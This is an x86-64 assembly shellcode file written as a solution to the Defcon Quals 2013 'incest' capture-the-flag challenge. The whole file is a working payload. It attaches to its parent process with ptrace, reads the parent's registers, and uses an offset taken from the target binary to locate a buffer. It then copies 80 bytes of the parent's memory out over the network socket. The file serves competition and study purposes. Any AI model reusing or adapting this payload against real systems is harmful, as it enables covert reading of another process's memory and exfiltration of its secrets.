;
; Defcon Quals 2013 - incest
;
; ptrace parent shellcode for sis
; by timhsu@chroot.org, June 2013
BITS 64
GLOBAL _start
_start:
jmp get_buf ;
run:
pop rsi
push rsi ; save buffer address
push rsi ; ptr = buffer
xor rax, rax ; zero the registers
xor rdi, rdi
xor rdx, rdx
xor rbx, rbx
; sys_getppid()
add rax, 110
syscall
mov rsi, rax ; get ppid
push rsi
pop rbx ; save ppi dto rbx
try_attach:
; sys_ptrace(request, pid, addr, data);
; rdi , rsi, rdx, r10
xor rax, rax
add rax, 101
xor rdx, rdx
; PTRACE_ATTACH 16
xor rdi, rdi
add rdi, 16
syscall
; wait4(pid, status, opt, rusage)
; rdi rsi rdx, r10
try_wait:
xor rax, rax
; NR_wait4 = 61
add rax, 61
mov rdi, rbx
xor rsi, rsi
xor rdx, rdx
xor r10, r10
syscall
try_getregs:
mov rsi, rbx ; get ppid
xor rax, rax
add rax, 101
xor rdx, rdx
;
; PTRACE_GETREGS (rdi, rsi, rdx, r10);
mov rdi, 12
pop r10
push r10
syscall
mov rdx, [r10+4*8] ; get rbp of parent(ppid)
try_peektext:
sub rdx, 0x18 ; from disasm sis,
; get buffer address of parent
do_peektext:
mov rsi, rbx ; get ppid
call ptrace_peektext
mov rdx, [r10] ; rdx = address
mov rcx, 10 ; read 10 times
again_peektext:
; PTRACE_PEEKTEXT again => loop for get more data
mov rsi, rbx
call ptrace_peektext
add r10, 8 ; ptr+=8
add rdx, 8 ; address+=8
loop again_peektext
dump:
pop rsi ; ptr
pop rsi ; buffer, to dump
; sys_write(stdout, buffer, length)
xor rax, rax
xor rdx, rdx
add rax, 1 ; sys_write
xor rdi, rdi
add rdi, 4 ; socket = 4
add rdx, 80 ; string length
syscall
; sys_exit
xor rax, rax
add rax, 60 ; sys_exit
syscall
ptrace_peektext:
; ptrace(rdi, rsi, rdx, r10);
; PTRACE_PEEKDATA 0x2
push rcx
xor rax, rax
xor rdi, rdi
mov rax, 101
mov rdi, 2
syscall
pop rcx
ret
get_buf:
call run ; put address of buffer onto the stack
buffer:
db 'AAAAAAAAAA'